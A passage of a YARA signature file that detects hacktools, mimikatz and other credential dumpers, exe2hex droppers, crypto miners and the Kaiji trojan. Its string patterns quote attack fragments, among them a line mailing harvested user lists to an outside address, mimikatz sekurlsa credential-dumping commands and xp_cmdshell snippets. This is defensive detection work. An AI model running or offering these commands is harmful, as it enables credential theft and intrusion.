  condition:
    all of them
}

rule sig_238_xsniff {
  meta:
    description = "Disclosed hacktool set (old stuff) - file xsniff.exe"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "d61d7329ac74f66245a92c4505a327c85875c577"
  strings:
    $s2 = "xsiff.exe -pass -hide -log pass.log" ascii fullword
    $s3 = "%s - simple sniffer for win2000" ascii fullword
    $s4 = "xsiff.exe -tcp -udp -asc -addr 192.168.1.1" ascii fullword
    $s5 = "HOST: %s USER: %s, PASS: %s" ascii fullword
    $s7 = "http://www.xfocus.org" ascii fullword
    $s9 = "  -pass        : Filter username/password" ascii fullword
    $s18 = "  -udp         : Output udp packets" ascii fullword
    $s19 = "Code by glacier <glacier@xfocus.org>" ascii fullword
    $s20 = "  -tcp         : Output tcp packets" ascii fullword
  condition:
    6 of them
}

rule sig_238_fscan {
  meta:
    description = "Disclosed hacktool set (old stuff) - file fscan.exe"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    hash = "d5646e86b5257f9c83ea23eca3d86de336224e55"
  strings:
    $s0 = "FScan v1.12 - Command line port scanner." ascii fullword
    $s2 = " -n    - no port scanning - only pinging (unless you use -q)" ascii fullword
    $s5 = "Example: fscan -bp 80,100-200,443 10.0.0.1-10.0.1.200" ascii fullword
    $s6 = " -z    - maximum simultaneous threads to use for scanning" ascii fullword
    $s12 = "Failed to open the IP list file \"%s\"" ascii fullword
    $s13 = "http://www.foundstone.com" ascii fullword
    $s16 = " -p    - TCP port(s) to scan (a comma separated list of ports/ranges) " ascii fullword
    $s18 = "Bind port number out of range. Using system default." ascii fullword
    $s19 = "fscan.exe" wide fullword
  condition:
    4 of them
}

rule _iissample_nesscan_twwwscan {
  meta:
    description = "Disclosed hacktool set (old stuff) - from files iissample.exe, nesscan.exe, twwwscan.exe"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    super_rule = 1
    hash0 = "7f20962bbc6890bf48ee81de85d7d76a8464b862"
    hash1 = "c0b1a2196e82eea4ca8b8c25c57ec88e4478c25b"
    hash2 = "548f0d71ef6ffcc00c0b44367ec4b3bb0671d92f"
  strings:
    $s0 = "Connecting HTTP Port - Result: " fullword
    $s1 = "No space for command line argument vector" fullword
    $s3 = "Microsoft(July/1999~) http://www.microsoft.com/technet/security/current.asp" fullword
    $s5 = "No space for copy of command line" fullword
    $s7 = "-  Windows NT,2000 Patch Method  - " fullword
    $s8 = "scanf : floating point formats not linked" fullword
    $s12 = "hrdir_b.c: LoadLibrary != mmdll borlndmm failed" fullword
    $s13 = "!\"what?\"" fullword
    $s14 = "%s Port %d Closed" fullword
    $s16 = "printf : floating point formats not linked" fullword
    $s17 = "xxtype.cpp" fullword
  condition:
    all of them
}

rule _FsHttp_FsPop_FsSniffer {
  meta:
    description = "Disclosed hacktool set (old stuff) - from files FsHttp.exe, FsPop.exe, FsSniffer.exe"
    author = "Florian Roth"
    date = "23.11.14"
    score = 60
    super_rule = 1
    hash0 = "9d4e7611a328eb430a8bb6dc7832440713926f5f"
    hash1 = "ae23522a3529d3313dd883727c341331a1fb1ab9"
    hash2 = "7ffc496cd4a1017485dfb571329523a52c9032d8"
  strings:
    $s0 = "-ERR Invalid Command, Type [Help] For Command List" fullword
    $s1 = "-ERR Get SMS Users ID Failed" fullword
    $s2 = "Control Time Out 90 Secs, Connection Closed" fullword
    $s3 = "-ERR Post SMS Failed" fullword
    $s4 = "Current.hlt" fullword
    $s6 = "Histroy.hlt" fullword
    $s7 = "-ERR Send SMS Failed" fullword
    $s12 = "-ERR Change Password <New Password>" fullword
    $s17 = "+OK Send SMS Succussifully" fullword
    $s18 = "+OK Set New Password: [%s]" fullword
    $s19 = "CHANGE PASSWORD" fullword
  condition:
    all of them
}

rule Ammyy_Admin_AA_v3 {
  meta:
    description = "Remote Admin Tool used by APT group Anunak (ru) - file AA_v3.4.exe and AA_v3.5.exe"
    author = "Florian Roth"
    reference = "http://goo.gl/gkAg2E"
    date = "2014/12/22"
    score = 55
    hash1 = "b130611c92788337c4f6bb9e9454ff06eb409166"
    hash2 = "07539abb2623fe24b9a05e240f675fa2d15268cb"
  strings:
    $x1 = "S:\\Ammyy\\sources\\target\\TrService.cpp" ascii fullword
    $x2 = "S:\\Ammyy\\sources\\target\\TrDesktopCopyRect.cpp" ascii fullword
    $x3 = "Global\\Ammyy.Target.IncomePort" ascii fullword
    $x4 = "S:\\Ammyy\\sources\\target\\TrFmFileSys.cpp" ascii fullword
    $x5 = "Please enter password for accessing remote computer" ascii fullword
    $s1 = "CreateProcess1()#3 %d error=%d" ascii fullword
    $s2 = "CHttpClient::SendRequest2(%s, %s, %d) error: invalid host name." ascii fullword
    $s3 = "ERROR: CreateProcessAsUser() error=%d, session=%d" ascii fullword
    $s4 = "ERROR: FindProcessByName('explorer.exe')" ascii fullword
  condition:
    2 of ($x*) or all of ($s*)
}

rule LinuxHacktool_eyes_screen {
  meta:
    description = "Linux hack tools - file screen"
    author = "Florian Roth"
    reference = "not set"
    date = "2015/01/19"
    hash = "a240a0118739e72ff89cefa2540bf0d7da8f8a6c"
  strings:
    $s0 = "or: %s -r [host.tty]" ascii fullword
    $s1 = "%s: process: character, ^x, or (octal) \\032 expected." ascii fullword
    $s2 = "Type \"screen [-d] -r [pid.]tty.host\" to resume one of them." ascii fullword
    $s6 = "%s: at [identifier][%%|*|#] command [args]" ascii fullword
    $s8 = "Slurped only %d characters (of %d) into buffer - try again" ascii fullword
    $s11 = "command from %s: %s %s" ascii fullword
    $s16 = "[ Passwords don't match - your armor crumbles away ]" ascii fullword
    $s19 = "[ Passwords don't match - checking turned off ]" ascii fullword
  condition:
    all of them
}

rule LinuxHacktool_eyes_scanssh {
  meta:
    description = "Linux hack tools - file scanssh"
    author = "Florian Roth"
    reference = "not set"
    date = "2015/01/19"
    hash = "467398a6994e2c1a66a3d39859cde41f090623ad"
  strings:
    $s0 = "Connection closed by remote host" ascii fullword
    $s1 = "Writing packet : error on socket (or connection closed): %s" ascii fullword
    $s2 = "Remote connection closed by signal SIG%s %s" ascii fullword
    $s4 = "Reading private key %s failed (bad passphrase ?)" ascii fullword
    $s5 = "Server closed connection" ascii fullword
    $s6 = "%s: line %d: list delimiter not followed by keyword" ascii fullword
    $s8 = "checking for version `%s' in file %s required by file %s" ascii fullword
    $s9 = "Remote host closed connection" ascii fullword
    $s10 = "%s: line %d: bad command `%s'" ascii fullword
    $s13 = "verifying that server is a known host : file %s not found" ascii fullword
    $s14 = "%s: line %d: expected service, found `%s'" ascii fullword
    $s15 = "%s: line %d: list delimiter not followed by domain" ascii fullword
    $s17 = "Public key from server (%s) doesn't match user preference (%s)" ascii fullword
  condition:
    all of them
}

rule LinuxHacktool_eyes_pscan2 {
  meta:
    description = "Linux hack tools - file pscan2"
    author = "Florian Roth"
    reference = "not set"
    date = "2015/01/19"
    hash = "56b476cba702a4423a2d805a412cae8ef4330905"
  strings:
    $s0 = "# pscan completed in %u seconds. (found %d ips)" ascii fullword
    $s1 = "Usage: %s <b-block> <port> [c-block]" ascii fullword
    $s3 = "%s.%d.* (total: %d) (%.1f%% done)" ascii fullword
    $s8 = "Invalid IP." ascii fullword
    $s9 = "# scanning: " ascii fullword
    $s10 = "Unable to allocate socket." ascii fullword
  condition:
    2 of them
}

rule LinuxHacktool_eyes_a {
  meta:
    description = "Linux hack tools - file a"
    author = "Florian Roth"
    reference = "not set"
    date = "2015/01/19"
    hash = "458ada1e37b90569b0b36afebba5ade337ea8695"
  strings:
    $s0 = "cat trueusers.txt | mail -s \"eyes\" clubby@slucia.com" ascii fullword
    $s1 = "mv scan.log bios.txt" ascii fullword
    $s2 = "rm -rf bios.txt" ascii fullword
    $s3 = "echo -e \"# by Eyes.\"" ascii fullword
    $s4 = "././pscan2 $1 22" ascii fullword
    $s10 = "echo \"#cautam...\"" ascii fullword
  condition:
    2 of them
}

rule LinuxHacktool_eyes_mass {
  meta:
    description = "Linux hack tools - file mass"
    author = "Florian Roth"
    reference = "not set"
    date = "2015/01/19"
    hash = "2054cb427daaca9e267b252307dad03830475f15"
  strings:
    $s0 = "cat trueusers.txt | mail -s \"eyes\" clubby@slucia.com" ascii fullword
    $s1 = "echo -e \"${BLU}Private Scanner By Raphaello , DeMMoNN , tzepelush & DraC\\n\\r" ascii
    $s3 = "killall -9 pscan2" ascii fullword
    $s5 = "echo \"[*] ${DCYN}Gata esti h4x0r ;-)${RES}  [*]\"" ascii fullword
    $s6 = "echo -e \"${DCYN}@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#${RES}\"" ascii fullword
  condition:
    1 of them
}

rule LinuxHacktool_eyes_pscan2_2 {
  meta:
    description = "Linux hack tools - file pscan2.c"
    author = "Florian Roth"
    reference = "not set"
    date = "2015/01/19"
    hash = "eb024dfb441471af7520215807c34d105efa5fd8"
  strings:
    $s0 = "snprintf(outfile, sizeof(outfile) - 1, \"scan.log\", argv[1], argv[2]);" ascii fullword
    $s2 = "printf(\"Usage: %s <b-block> <port> [c-block]\\n\", argv[0]);" ascii fullword
    $s3 = "printf(\"\\n# pscan completed in %u seconds. (found %d ips)\\n\", (time(0) - sca" ascii
    $s19 = "connlist[i].addr.sin_family = AF_INET;" ascii fullword
    $s20 = "snprintf(last, sizeof(last) - 1, \"%s.%d.* (total: %d) (%.1f%% done)\"," ascii fullword
  condition:
    2 of them
}

rule CN_Portscan : APT {
  meta:
    description = "CN Port Scanner"
    author = "Florian Roth"
    release_date = "2013-11-29"
    confidential = false
    score = 70
  strings:
    $s1 = "MZ"
    $s2 = "TCP 12.12.12.12"
  condition:
    ($s1 at 0) and $s2
}

rule WMI_vbs : APT {
  meta:
    description = "WMI Tool - APT"
    author = "Florian Roth"
    release_date = "2013-11-29"
    confidential = false
    score = 70
  strings:
    $s3 = "WScript.Echo \"   $$\\      $$\\ $$\\      $$\\ $$$$$$\\ $$$$$$$$\\ $$\\   $$\\ $$$$$$$$\\  $$$$$$"
  condition:
    all of them
}

rule CN_Toolset__XScanLib_XScanLib_XScanLib {
  meta:
    description = "Detects a Chinese hacktool from a disclosed toolset - from files XScanLib.dll, XScanLib.dll, XScanLib.dll"
    author = "Florian Roth"
    reference = "http://qiannao.com/ls/905300366/33834c0c/"
    reference2 = "https://raw.githubusercontent.com/Neo23x0/Loki/master/signatures/thor-hacktools.yar"
    date = "2015/03/30"
    score = 70
    super_rule = 1
    hash0 = "af419603ac28257134e39683419966ab3d600ed2"
    hash1 = "c5cb4f75cf241f5a9aea324783193433a42a13b0"
    hash2 = "135f6a28e958c8f6a275d8677cfa7cb502c8a822"
  strings:
    $s1 = "Plug-in thread causes an exception, failed to alert user." fullword
    $s2 = "PlugGetUdpPort" fullword
    $s3 = "XScanLib.dll" fullword
    $s4 = "PlugGetTcpPort" fullword
    $s11 = "PlugGetVulnNum" fullword
  condition:
    all of them
}

rule CN_Toolset_NTscan_PipeCmd {
  meta:
    description = "Detects a Chinese hacktool from a disclosed toolset - file PipeCmd.exe"
    author = "Florian Roth"
    reference = "http://qiannao.com/ls/905300366/33834c0c/"
    reference2 = "https://raw.githubusercontent.com/Neo23x0/Loki/master/signatures/thor-hacktools.yar"
    date = "2015/03/30"
    score = 70
    hash = "a931d65de66e1468fe2362f7f2e0ee546f225c4e"
  strings:
    $s2 = "Please Use NTCmd.exe Run This Program." ascii fullword
    $s3 = "PipeCmd.exe" wide fullword
    $s4 = "\\\\.\\pipe\\%s%s%d" ascii fullword
    $s5 = "%s\\pipe\\%s%s%d" ascii fullword
    $s6 = "%s\\ADMIN$\\System32\\%s%s" ascii fullword
    $s7 = "%s\\ADMIN$\\System32\\%s" ascii fullword
    $s9 = "PipeCmdSrv.exe" ascii fullword
    $s10 = "This is a service executable! Couldn't start directly." ascii fullword
    $s13 = "\\\\.\\pipe\\PipeCmd_communicaton" ascii fullword
    $s14 = "PIPECMDSRV" wide fullword
    $s15 = "PipeCmd Service" ascii fullword
  condition:
    4 of them
}

rule CN_Toolset_LScanPortss_2 {
  meta:
    description = "Detects a Chinese hacktool from a disclosed toolset - file LScanPortss.exe"
    author = "Florian Roth"
    reference = "http://qiannao.com/ls/905300366/33834c0c/"
    reference2 = "https://raw.githubusercontent.com/Neo23x0/Loki/master/signatures/thor-hacktools.yar"
    date = "2015/03/30"
    score = 70
    hash = "4631ec57756466072d83d49fbc14105e230631a0"
  strings:
    $s1 = "LScanPort.EXE" wide fullword
    $s3 = "www.honker8.com" wide fullword
    $s4 = "DefaultPort.lst" ascii fullword
    $s5 = "Scan over.Used %dms!" ascii fullword
    $s6 = "www.hf110.com" wide fullword
    $s15 = "LScanPort Microsoft " wide fullword
    $s18 = "L-ScanPort2.0 CooFly" wide fullword
  condition:
    4 of them
}

rule CN_Toolset_sig_1433_135_sqlr {
  meta:
    description = "Detects a Chinese hacktool from a disclosed toolset - file sqlr.exe"
    author = "Florian Roth"
    reference = "http://qiannao.com/ls/905300366/33834c0c/"
    reference2 = "https://raw.githubusercontent.com/Neo23x0/Loki/master/signatures/thor-hacktools.yar"
    date = "2015/03/30"
    score = 70
    hash = "8542c7fb8291b02db54d2dc58cd608e612bfdc57"
  strings:
    $s0 = "Connect to %s MSSQL server success. Type Command at Prompt." ascii fullword
    $s11 = ";DATABASE=master" ascii fullword
    $s12 = "xp_cmdshell '" ascii fullword
    $s14 = "SELECT * FROM OPENROWSET('SQLOLEDB','Trusted_Connection=Yes;Data Source=myserver" ascii
  condition:
    all of them
}

rule Mimikatz_Memory_Rule_1 : APT {
  meta:
    author = "Florian Roth"
    date = "12/22/2014"
    score = 70
    type = "memory"
    description = "Detects password dumper mimikatz in memory"
  strings:
    $s1 = "sekurlsa::msv" ascii fullword
    $s2 = "sekurlsa::wdigest" ascii fullword
    $s4 = "sekurlsa::kerberos" ascii fullword
    $s5 = "sekurlsa::tspkg" ascii fullword
    $s6 = "sekurlsa::livessp" ascii fullword
    $s7 = "sekurlsa::ssp" ascii fullword
    $s8 = "sekurlsa::logonPasswords" ascii fullword
    $s9 = "sekurlsa::process" ascii fullword
    $s10 = "ekurlsa::minidump" ascii fullword
    $s11 = "sekurlsa::pth" ascii fullword
    $s12 = "sekurlsa::tickets" ascii fullword
    $s13 = "sekurlsa::ekeys" ascii fullword
    $s14 = "sekurlsa::dpapi" ascii fullword
    $s15 = "sekurlsa::credman" ascii fullword
  condition:
    1 of them
}

rule Mimikatz_Memory_Rule_2 : APT {
  meta:
    description = "Mimikatz Rule generated from a memory dump"
    author = "Florian Roth - Florian Roth"
    type = "memory"
    score = 80
  strings:
    $s0 = "sekurlsa::" ascii
    $x1 = "cryptprimitives.pdb" ascii
    $x2 = "Now is t1O" ascii fullword
    $x4 = "ALICE123" ascii
    $x5 = "BOBBY456" ascii
  condition:
    $s0 and 1 of ($x*)
}

rule mimikatz {
  meta:
    description = "mimikatz"
    author = "Benjamin DELPY (gentilkiwi)"
    tool_author = "Benjamin DELPY (gentilkiwi)"
    score = 80
  strings:
    $exe_x86_1 = { 89 71 04 89 [0-3] 30 8D 04 BD }
    $exe_x86_2 = { 89 79 04 89 [0-3] 38 8D 04 B5 }
    $exe_x64_1 = { 4C 03 D8 49 [0-3] 8B 03 48 89 }
    $exe_x64_2 = { 4C 8B DF 49 [0-3] C1 E3 04 48 [0-3] 8B CB 4C 03 [0-3] D8 }
    $dll_1 = { C7 0? 00 00 01 00 [4-14] C7 0? 01 00 00 00 }
    $dll_2 = { C7 0? 10 02 00 00 ?? 89 4? }
    $sys_x86 = { A0 00 00 00 24 02 00 00 40 00 00 00 [0-4] B8 00 00 00 6C 02 00 00 40 00 00 00 }
    $sys_x64 = { 88 01 00 00 3C 04 00 00 40 00 00 00 [0-4] E8 02 00 00 F8 02 00 00 40 00 00 00 }
  condition:
    (all of ($exe_x86_*)) or (all of ($exe_x64_*)) or (all of ($dll_*)) or (any of ($sys_*))
}

rule mimikatz_lsass_mdmp {
  meta:
    description = "LSASS minidump file for mimikatz"
    author = "Benjamin DELPY (gentilkiwi)"
  strings:
    $lsass = "System32\\lsass.exe" wide nocase
  condition:
    (uint32(0) == 1347241037) and $lsass
}

rule wce {
  meta:
    description = "wce"
    author = "Benjamin DELPY (gentilkiwi)"
    tool_author = "Hernan Ochoa (hernano)"
  strings:
    $hex_legacy = { 8B FF 55 8B EC 6A 00 FF 75 0C FF 75 08 E8 [0-3] 5D C2 08 00 }
    $hex_x86 = { 8D 45 F0 50 8D 45 F8 50 8D 45 E8 50 6A 00 8D 45 FC 50 [0-8] 50 72 69 6D 61 72 79 00 }
    $hex_x64 = { FF F3 48 83 EC 30 48 8B D9 48 8D 15 [0-16] 50 72 69 6D 61 72 79 00 }
  condition:
    any of them
}

rule lsadump {
  meta:
    description = "LSA dump programe (bootkey/syskey) - pwdump and others"
    author = "Benjamin DELPY (gentilkiwi)"
  strings:
    $str_sam_inc = "\\Domains\\Account" ascii nocase
    $str_sam_exc = "\\Domains\\Account\\Users\\Names\\" ascii nocase
    $hex_api_call = { ( 41 B8 | 68 ) 00 00 00 02 [0-64] ( 68 | BA ) FF 07 0F 00 }
    $str_msv_lsa = { 4C 53 41 53 52 56 2E 44 4C 4C 00 [0-32] 6D 73 76 31 5F 30 2E 64 6C 6C 00 }
    $hex_bkey = { 4B 53 53 4D [20-70] 05 00 01 00 }
  condition:
    (($str_sam_inc and not $str_sam_exc) or $hex_api_call or $str_msv_lsa or $hex_bkey) and not uint16(0) == 23117
}

rule Mimikatz_Logfile {
  meta:
    description = "Detects a log file generated by malicious hack tool mimikatz"
    author = "Florian Roth"
    score = 80
    date = "2015/03/31"
    reference = "https://github.com/Neo23x0/Loki/blob/master/signatures/thor-hacktools.yar"
  strings:
    $s1 = "SID               :" ascii fullword
    $s2 = "* NTLM     :" ascii fullword
    $s3 = "Authentication Id :" ascii fullword
    $s4 = "wdigest :" ascii fullword
  condition:
    all of them
}

rule AppInitHook {
  meta:
    description = "AppInitGlobalHooks-Mimikatz - Hide Mimikatz From Process Lists - file AppInitHook.dll"
    author = "Florian Roth"
    reference = "https://goo.gl/Z292v6"
    date = "2015-07-15"
    score = 70
    hash = "e7563e4f2a7e5f04a3486db4cefffba173349911a3c6abd7ae616d3bf08cfd45"
  strings:
    $s0 = "\\Release\\AppInitHook.pdb" ascii
    $s1 = "AppInitHook.dll" ascii fullword
    $s2 = "mimikatz.exe" wide fullword
    $s3 = "]X86Instruction->OperandSize >= Operand->Length" wide fullword
    $s4 = "mhook\\disasm-lib\\disasm.c" wide fullword
    $s5 = "mhook\\disasm-lib\\disasm_x86.c" wide fullword
    $s6 = "VoidFunc" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 512000 and 4 of them
}

rule VSSown_VBS {
  meta:
    description = "Detects VSSown.vbs script - used to export shadow copy elements like NTDS to take away and crack elsewhere"
    author = "Florian Roth"
    date = "2015-10-01"
    score = 75
  strings:
    $s0 = "Select * from Win32_Service Where Name ='VSS'" ascii
    $s1 = "Select * From Win32_ShadowCopy" ascii
    $s2 = "cmd /C mklink /D " ascii
    $s3 = "ClientAccessible" ascii
    $s4 = "WScript.Shell" ascii
    $s5 = "Win32_Process" ascii
  condition:
    all of them
}

rule wineggdrop : portscanner toolkit {
  meta:
    author = "Christian Rebischke (@sh1bumi)"
    date = "2015-09-05"
    description = "Rules for TCP Portscanner VX.X by WinEggDrop"
    in_the_wild = true
    family = "Hackingtool/Portscanner"
  strings:
    $a = { 54 43 50 20 50 6F 72 74 20 53 63 61 6E 6E 65 72 20 56 3? 2E 3? 20 42 79 20 57 69 6E 45 67 67 44 72 6F 70 0A }
    $b = "Result.txt"
    $c = "Usage:   %s TCP/SYN StartIP [EndIP] Ports [Threads] [/T(N)] [/(H)Banner] [/Save]\n"
  condition:
    uint16(0) == 23117 and $a and $b and $c
}

rule Payload_Exe2Hex : toolkit {
  meta:
    description = "Detects payload generated by exe2hex"
    author = "Florian Roth"
    reference = "https://github.com/g0tmi1k/exe2hex"
    date = "2016-01-15"
    score = 70
  strings:
    $a1 = "set /p \"=4d5a" ascii
    $a2 = "powershell -Command \"$hex=" ascii
    $b1 = "set+%2Fp+%22%3D4d5" ascii
    $b2 = "powershell+-Command+%22%24hex" ascii
    $c1 = "echo 4d 5a " ascii
    $c2 = "echo r cx >>" ascii
    $d1 = "echo+4d+5a+" ascii
    $d2 = "echo+r+cx+%3E%3E" ascii
  condition:
    all of ($a*) or all of ($b*) or all of ($c*) or all of ($d*)
}

rule CoinMiner_Strings : SCRIPT HIGHVOL {
  meta:
    description = "Detects mining pool protocol string in Executable"
    author = "Florian Roth (Nextron Systems)"
    score = 60
    reference = "https://minergate.com/faq/what-pool-address"
    date = "2018-01-04"
    modified = "2021-10-26"
    nodeepdive = 1
    id = "ac045f83-5f32-57a9-8011-99a2658a0e05"
  strings:
    $sa1 = "stratum+tcp://" ascii
    $sa2 = "stratum+udp://" ascii
    $sb1 = "\"normalHashing\": true,"
  condition:
    filesize < 3072000 and 1 of them
}

rule CoinHive_Javascript_MoneroMiner : HIGHVOL {
  meta:
    description = "Detects CoinHive - JavaScript Crypto Miner"
    license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
    author = "Florian Roth (Nextron Systems)"
    score = 50
    reference = "https://coinhive.com/documentation/miner"
    date = "2018-01-04"
    id = "4f40c342-fcdc-5c73-a3cf-7b2ed438eaaf"
  strings:
    $s2 = "CoinHive.CONFIG.REQUIRES_AUTH" ascii fullword
  condition:
    filesize < 66560 and 1 of them
}

rule PUA_CryptoMiner_Jan19_1 {
  meta:
    description = "Detects Crypto Miner strings"
    author = "Florian Roth (Nextron Systems)"
    reference = "Internal Research"
    date = "2019-01-31"
    score = 80
    hash1 = "ede858683267c61e710e367993f5e589fcb4b4b57b09d023a67ea63084c54a05"
    id = "aebfdce9-c2dd-5f24-aa25-071e1a961239"
  strings:
    $s1 = "Stratum notify: invalid Merkle branch" ascii fullword
    $s2 = "-t, --threads=N       number of miner threads (default: number of processors)" ascii fullword
    $s3 = "User-Agent: cpuminer/" ascii
    $s4 = "hash > target (false positive)" ascii fullword
    $s5 = "thread %d: %lu hashes, %s khash/s" ascii fullword
  condition:
    filesize < 1024000 and 1 of them
}

rule PUA_Crypto_Mining_CommandLine_Indicators_Oct21 : SCRIPT {
  meta:
    description = "Detects command line parameters often used by crypto mining software"
    author = "Florian Roth (Nextron Systems)"
    reference = "https://www.poolwatch.io/coin/monero"
    date = "2021-10-24"
    score = 65
    id = "afe5a63a-08c3-5cb7-b4b1-b996068124b7"
  strings:
    $s01 = " --cpu-priority="
    $s02 = "--donate-level=0"
    $s03 = " -o pool."
    $s04 = " -o stratum+tcp://"
    $s05 = " --nicehash"
    $s06 = " --algo=rx/0 "
    $se1 = "LS1kb25hdGUtbGV2ZWw9"
    $se2 = "0tZG9uYXRlLWxldmVsP"
    $se3 = "tLWRvbmF0ZS1sZXZlbD"
    $se4 = "c3RyYXR1bSt0Y3A6Ly"
    $se5 = "N0cmF0dW0rdGNwOi8v"
    $se6 = "zdHJhdHVtK3RjcDovL"
    $se7 = "c3RyYXR1bSt1ZHA6Ly"
    $se8 = "N0cmF0dW0rdWRwOi8v"
    $se9 = "zdHJhdHVtK3VkcDovL"
  condition:
    filesize < 5120000 and 1 of them
}

rule XMRIG_Monero_Miner : HIGHVOL {
  meta:
    description = "Detects Monero mining software"
    license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
    author = "Florian Roth (Nextron Systems)"
    reference = "https://github.com/xmrig/xmrig/releases"
    date = "2018-01-04"
    modified = "2022-11-10"
    modified = "2022-11-10"
    hash1 = "5c13a274adb9590249546495446bb6be5f2a08f9dcd2fc8a2049d9dc471135c0"
    hash2 = "08b55f9b7dafc53dfc43f7f70cdd7048d231767745b76dc4474370fb323d7ae7"
    hash3 = "f3f2703a7959183b010d808521b531559650f6f347a5830e47f8e3831b10bad5"
    hash4 = "0972ea3a41655968f063c91a6dbd31788b20e64ff272b27961d12c681e40b2d2"
    id = "71bf1b9c-c806-5737-83a9-d6013872b11d"
  strings:
    $s1 = "'h' hashrate, 'p' pause, 'r' resume" ascii fullword
    $s2 = "--cpu-affinity" ascii
    $s3 = "set process affinity to CPU core(s), mask 0x3 for cores 0 and 1" ascii
    $s4 = "password for mining server" ascii fullword
    $s5 = "XMRig/%s libuv/%s%s" ascii fullword
  condition:
    (uint16(0) == 23117 or uint16(0) == 17791) and filesize < 10485760 and 2 of them
}

rule XMRIG_Monero_Miner_Config {
  meta:
    description = "Auto-generated rule - from files config.json, config.json"
    license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
    author = "Florian Roth (Nextron Systems)"
    reference = "https://github.com/xmrig/xmrig/releases"
    date = "2018-01-04"
    hash1 = "031333d44a3a917f9654d7e7257e00c9d961ada3bee707de94b7c7d06234909a"
    hash2 = "409b6ec82c3bdac724dae702e20cb7f80ca1e79efa4ff91212960525af016c41"
    id = "374efe7f-9ef2-5974-8e24-f749183ab2d0"
  strings:
    $s2 = "\"cpu-affinity\": null,   // set process affinity to CPU core(s), mask \"0x3\" for cores 0 and 1" ascii fullword
    $s5 = "\"nicehash\": false                  // enable nicehash/xmrig-proxy support" ascii fullword
    $s8 = "\"algo\": \"cryptonight\",  // cryptonight (default) or cryptonight-lite" ascii fullword
  condition:
    (uint16(0) == 2683 or uint16(0) == 3451) and filesize < 5120 and 1 of them
}

rule PUA_LNX_XMRIG_CryptoMiner {
  meta:
    description = "Detects XMRIG CryptoMiner software"
    license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
    author = "Florian Roth (Nextron Systems)"
    reference = "Internal Research"
    date = "2018-06-28"
    modified = "2023-01-06"
    hash1 = "10a72f9882fc0ca141e39277222a8d33aab7f7a4b524c109506a407cd10d738c"
    id = "bbdeff2e-68cc-5bbe-b843-3cba9c8c7ea8"
  strings:
    $x1 = "number of hash blocks to process at a time (don't set or 0 enables automatic selection o" ascii fullword
    $s2 = "'h' hashrate, 'p' pause, 'r' resume, 'q' shutdown" ascii fullword
    $s3 = "* THREADS:      %d, %s, aes=%d, hf=%zu, %sdonate=%d%%" ascii fullword
    $s4 = ".nicehash.com" ascii
  condition:
    uint16(0) == 17791 and filesize < 8192000 and (1 of ($x*) or 2 of them)
}

rule SUSP_XMRIG_String {
  meta:
    description = "Detects a suspicious XMRIG crypto miner executable string in filr"
    author = "Florian Roth (Nextron Systems)"
    reference = "Internal Research"
    date = "2018-12-28"
    hash1 = "eb18ae69f1511eeb4ed9d4d7bcdf3391a06768f384e94427f4fc3bd21b383127"
    id = "8c6f3e6e-df2a-51b7-81b8-21cd33b3c603"
  strings:
    $x1 = "xmrig.exe" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 2048000 and 1 of them
}

rule Linux_Trojan_Kaiji_253c44de {
  meta:
    author = "Elastic Security"
    id = "253c44de-3f48-49f9-998d-1dec2981108c"
    fingerprint = "f390a16ca4270dc38ce1a52bbdc1ac57155f369a74005ff2a4e46c6d043b869e"
    creation_date = "2021-01-12"
    last_modified = "2021-09-16"
    threat_name = "Linux.Trojan.Kaiji"
    reference_sample = "e31eb8880bb084b4c642eba127e64ce99435ea8299a98c183a63a2e6a139d926"
    severity = 100
    arch_context = "x86"
    scan_context = "file, memory"
    license = "Elastic License v2"
    os = "linux"
  strings:
    $a = { EB 27 0F B6 1C 10 48 8B 74 24 40 48 8B BC 24 90 00 00 00 88 }
  condition:
    all of them
}

rule Linux_Trojan_Kaiji_535f07ac {
  meta:
    author = "Elastic Security"
    id = "535f07ac-d727-4866-aaed-74d297a1092c"
    fingerprint = "8853b2a1d5852e436cab2e3402a5ca13839b3cae6fbb56a74b047234b8c1233b"
    creation_date = "2021-01-12"
    last_modified = "2021-09-16"
    threat_name = "Linux.Trojan.Kaiji"
    reference_sample = "28b2993d7c8c1d8dfce9cd2206b4a3971d0705fd797b9fde05211686297f6bb0"
    severity = 100
    arch_context = "x86"
    scan_context = "file, memory"
    license = "Elastic License v2"
    os = "linux"
  strings:
    $a = { 44 24 10 48 8B 4C 24 08 48 83 7C 24 18 00 74 26 C6 44 24 57 00 48 8B 84 24 98 00 }
  condition:
    all of them
}

rule Linux_Trojan_Kaiji_dcf6565e {
  meta:
    author = "Elastic Security"
    id = "dcf6565e-8287-4d78-b103-53cfab192025"
    fingerprint = "381d6b8f6a95800fe0d20039f991ce82317f60aef100487f3786e6c1e63376e1"
    creation_date = "2022-09-12"
    last_modified = "2022-10-18"
    threat_name = "Linux.Trojan.Kaiji"
    reference_sample = "49f3086105bdc160248e66334db00ce37cdc9167a98faac98800b2c97515b6e7"
    severity = 100
    arch_context = "x86"
    scan_context = "file, memory"
    license = "Elastic License v2"
    os = "linux"
  strings:
    $a = { 48 69 D2 9B 00 00 00 48 C1 EA 20 83 C2 64 48 8B 9C 24 B8 00 }
  condition:
    all of them
}

rule Linux_Trojan_Kaiji_91091be3 {
  meta:
    author = "Elastic Security"
    id = "91091be3-8c9e-4d7a-8ca6-cd422afe0aa5"
    fingerprint = "f583bbef07f41e74ba9646a3e97ef114eb34b1ae820ed499dffaad90db227ca6"
    creation_date = "2022-09-12"
    last_modified = "2022-10-18"
    threat_name = "Linux.Trojan.Kaiji"
    reference_sample = "dca574d13fcbd7d244d434fcbca68136e0097fefc5f131bec36e329448f9a202"
    severity = 100
    arch_context = "x86"
    scan_context = "file, memory"
    license = "Elastic License v2"
    os = "linux"
  strings:
    $a = { 24 18 83 7C 24 1C 02 75 9E 8B 4C 24 64 8B 51 1C 89 54 24 5C }
  condition:
    all of them
}

rule Linux_Trojan_FinalDraft_4ea5a204 {
  meta:
    author = "Elastic Security"
